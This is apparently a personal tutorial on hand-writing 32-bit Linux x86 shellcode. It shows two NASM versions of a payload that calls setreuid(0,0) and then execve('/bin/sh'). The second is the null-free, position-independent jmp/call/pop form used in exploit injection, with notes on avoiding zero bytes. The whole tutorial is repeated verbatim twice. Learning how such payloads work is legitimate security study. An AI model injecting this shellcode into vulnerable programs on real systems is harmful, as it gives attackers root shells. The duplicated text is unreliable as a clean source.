write shell code myself
Writing shellcode is an interesting thing, so let me do it myself!
The first version of it is not real shellcode, but it looks like it!
;; ---------------------------------------------------------------
;; Version 1: an ordinary standalone program, NOT position-independent.
;; Syntax: NASM (Intel).  Target: 32-bit Linux, int 0x80 ABI
;; (eax = syscall number; args in ebx, ecx, edx; result back in eax).
;; The 16-byte string below is used as a scratch record that the code
;; patches in place before execve:
;;   [0..6]   "/bin/sh"  the path
;;   [7]      'X'        overwritten at run time with a 0 byte (terminator)
;;   [8..11]  "AAAA"     overwritten with the string's address (argv[0])
;;   [12..15] "BBBB"     overwritten with 0 (argv[1] == NULL; also used as envp)
;; It lives in .data so that those stores go to writable memory.
;; ---------------------------------------------------------------
section .data
filepath db "/bin/shXAAAABBBB" ; the string; patched in place by the code below
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
;; on i386 Linux syscall 70 is setreuid(2); "setruid" is a misspelling of it
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
;; the result in eax is never checked: without uid 0 / CAP_SETUID this
;; call fails (EPERM) and execution simply falls through to execve
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0 ; eax = 0; also makes al = 0 for the terminator store below
mov ebx,filepath ; ebx = absolute address of the string (fixed at link time)
mov [ebx+7],al ; overwrite 'X' with 0: terminates "/bin/sh"
mov [ebx+8],ebx ; overwrite "AAAA": argv[0] = pointer to "/bin/sh"
mov [ebx+12],eax ; overwrite "BBBB": argv[1] = NULL
mov eax,11 ; eax = 11 = __NR_execve on i386 Linux
lea ecx,[ebx+8] ; ecx = argv
lea edx,[ebx+12] ; edx = envp (points at the NULL dword: empty environment)
int 0x80
In the second version, you can see that we move the data segment into the code segment.
;; ---------------------------------------------------------------
;; Version 2: the same two syscalls, written so that the code is
;; position-independent and contains no 0x00 bytes (see the notes
;; below the listing for why).
;; The string is placed right after "call one", so the return address
;; that "call" pushes IS the address of the string; "pop ebx" recovers it.
;; Register roles: ebx = string address / arg1, ecx = arg2, edx = arg3,
;; eax = syscall number.  Stack: one dword pushed by "call", popped at "one".
;; NOTE: the string sits in the same region as the code and is written
;; to at run time, so this only runs where that region is both writable
;; and executable; under W^X / NX protections the stores fault.
;; ---------------------------------------------------------------
;; setruid(uid_t ruid,uid_t euid)
;; on i386 Linux syscall 70 is setreuid(2); "setruid" is a misspelling of it
;; only al is written here: the upper 24 bits of eax stay whatever they were on entry
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx ; ebx = 0 (ruid) without the 00 bytes "mov ebx,0" would encode
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code; ecx = 0 (euid), same reason
;; result not checked: without uid 0 / CAP_SETUID this fails (EPERM) and falls through
int 0x80
jmp short two ; rel8 forward jump to the call that captures the string address
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax ; eax = 0 without 00 bytes; also al = 0 for the terminator store
mov [ebx+7],al ; overwrite 'X' with 0: terminates "/bin/sh"
mov [ebx+8],ebx ; overwrite "AAAA": argv[0] = pointer to "/bin/sh"
mov [ebx+12],eax ; overwrite "BBBB": argv[1] = NULL (also serves as envp)
mov al,11 ; eax = 11 = __NR_execve (eax was zeroed above, so al suffices)
lea ecx,[ebx+8] ; ecx = argv
lea edx,[ebx+12] ; edx = envp (points at the NULL dword: empty environment)
int 0x80
two:
call one ; pushes the address of the byte after this instruction, i.e. the string
db "/bin/shXAAAABBBB" ; scratch record: path, 'X' -> 0, "AAAA" -> argv[0], "BBBB" -> NULL
Be careful: the code "xor eax,eax" does the same thing as "mov eax,0", but why do we use it?
Because "mov eax,0" assembles to "b8 00 00 00 00", and the zero bytes would end the shellcode (in C, a 0 byte is the end of a string).
We change "mov eax,70" to "mov al,70" for the same reason.
Try to look at the executable code yourself. If you do not know how to, or you do not have a hex editor, you can try the hexedit written by me; I have given the source code before. It is written in C; copy it and compile it with gcc like this: "gcc -o hexedit hexedit.c". Then you can use it to see the shellcode; for me it is like this: "./hexedit shellcode".
Now we have done half of it; to write good shellcode, let's go further!
The first version of it is not real shellcode, but it looks like it!
;; ---------------------------------------------------------------
;; Version 1: an ordinary standalone program, NOT position-independent.
;; Syntax: NASM (Intel).  Target: 32-bit Linux, int 0x80 ABI
;; (eax = syscall number; args in ebx, ecx, edx; result back in eax).
;; The 16-byte string below is used as a scratch record that the code
;; patches in place before execve:
;;   [0..6]   "/bin/sh"  the path
;;   [7]      'X'        overwritten at run time with a 0 byte (terminator)
;;   [8..11]  "AAAA"     overwritten with the string's address (argv[0])
;;   [12..15] "BBBB"     overwritten with 0 (argv[1] == NULL; also used as envp)
;; It lives in .data so that those stores go to writable memory.
;; ---------------------------------------------------------------
section .data
filepath db "/bin/shXAAAABBBB" ; the string; patched in place by the code below
section .text
global _start
_start
;; setruid(uid_t ruid,uid_t euid)
;; on i386 Linux syscall 70 is setreuid(2); "setruid" is a misspelling of it
mov eax,70 ; setruid is syscall #70
mov ebx,0 ; set real uid to root
mov ecx,0 ; set effective uid to root
;; the result in eax is never checked: without uid 0 / CAP_SETUID this
;; call fails (EPERM) and execution simply falls through to execve
int 0x80
;; execve(const char *filename,char *const argv[],char *const envp[])
mov eax,0 ; eax = 0; also makes al = 0 for the terminator store below
mov ebx,filepath ; ebx = absolute address of the string (fixed at link time)
mov [ebx+7],al ; overwrite 'X' with 0: terminates "/bin/sh"
mov [ebx+8],ebx ; overwrite "AAAA": argv[0] = pointer to "/bin/sh"
mov [ebx+12],eax ; overwrite "BBBB": argv[1] = NULL
mov eax,11 ; eax = 11 = __NR_execve on i386 Linux
lea ecx,[ebx+8] ; ecx = argv
lea edx,[ebx+12] ; edx = envp (points at the NULL dword: empty environment)
int 0x80
In the second version, you can see that we move the data segment into the code segment.
;; ---------------------------------------------------------------
;; Version 2: the same two syscalls, written so that the code is
;; position-independent and contains no 0x00 bytes (see the notes
;; below the listing for why).
;; The string is placed right after "call one", so the return address
;; that "call" pushes IS the address of the string; "pop ebx" recovers it.
;; Register roles: ebx = string address / arg1, ecx = arg2, edx = arg3,
;; eax = syscall number.  Stack: one dword pushed by "call", popped at "one".
;; NOTE: the string sits in the same region as the code and is written
;; to at run time, so this only runs where that region is both writable
;; and executable; under W^X / NX protections the stores fault.
;; ---------------------------------------------------------------
;; setruid(uid_t ruid,uid_t euid)
;; on i386 Linux syscall 70 is setreuid(2); "setruid" is a misspelling of it
;; only al is written here: the upper 24 bits of eax stay whatever they were on entry
mov al,70 ; setruid is syscall #70
; mov ebx,0 ; set real uid to root
xor ebx,ebx ; ebx = 0 (ruid) without the 00 bytes "mov ebx,0" would encode
; mov ecx,0 ; set effective uid to root
xor ecx,ecx ; to move 0 from execute code; ecx = 0 (euid), same reason
;; result not checked: without uid 0 / CAP_SETUID this fails (EPERM) and falls through
int 0x80
jmp short two ; rel8 forward jump to the call that captures the string address
one:
pop ebx ; pop the "return address" from the stack
;; to put the address of the string into ebx
;; execve(const char *filename,char *const argv[],char *const envp[])
;; mov eax,0
xor eax,eax ; eax = 0 without 00 bytes; also al = 0 for the terminator store
mov [ebx+7],al ; overwrite 'X' with 0: terminates "/bin/sh"
mov [ebx+8],ebx ; overwrite "AAAA": argv[0] = pointer to "/bin/sh"
mov [ebx+12],eax ; overwrite "BBBB": argv[1] = NULL (also serves as envp)
mov al,11 ; eax = 11 = __NR_execve (eax was zeroed above, so al suffices)
lea ecx,[ebx+8] ; ecx = argv
lea edx,[ebx+12] ; edx = envp (points at the NULL dword: empty environment)
int 0x80
two:
call one ; pushes the address of the byte after this instruction, i.e. the string
db "/bin/shXAAAABBBB" ; scratch record: path, 'X' -> 0, "AAAA" -> argv[0], "BBBB" -> NULL
Be careful: the code "xor eax,eax" does the same thing as "mov eax,0", but why do we use it?
Because "mov eax,0" assembles to "b8 00 00 00 00", and the zero bytes would end the shellcode (in C, a 0 byte is the end of a string).
We change "mov eax,70" to "mov al,70" for the same reason.
Try to look at the executable code yourself. If you do not know how to, or you do not have a hex editor, you can try the hexedit written by me; I have given the source code before. It is written in C; copy it and compile it with gcc like this: "gcc -o hexedit hexedit.c". Then you can use it to see the shellcode; for me it is like this: "./hexedit shellcode".
Now we have done half of it; to write good shellcode, let's go further!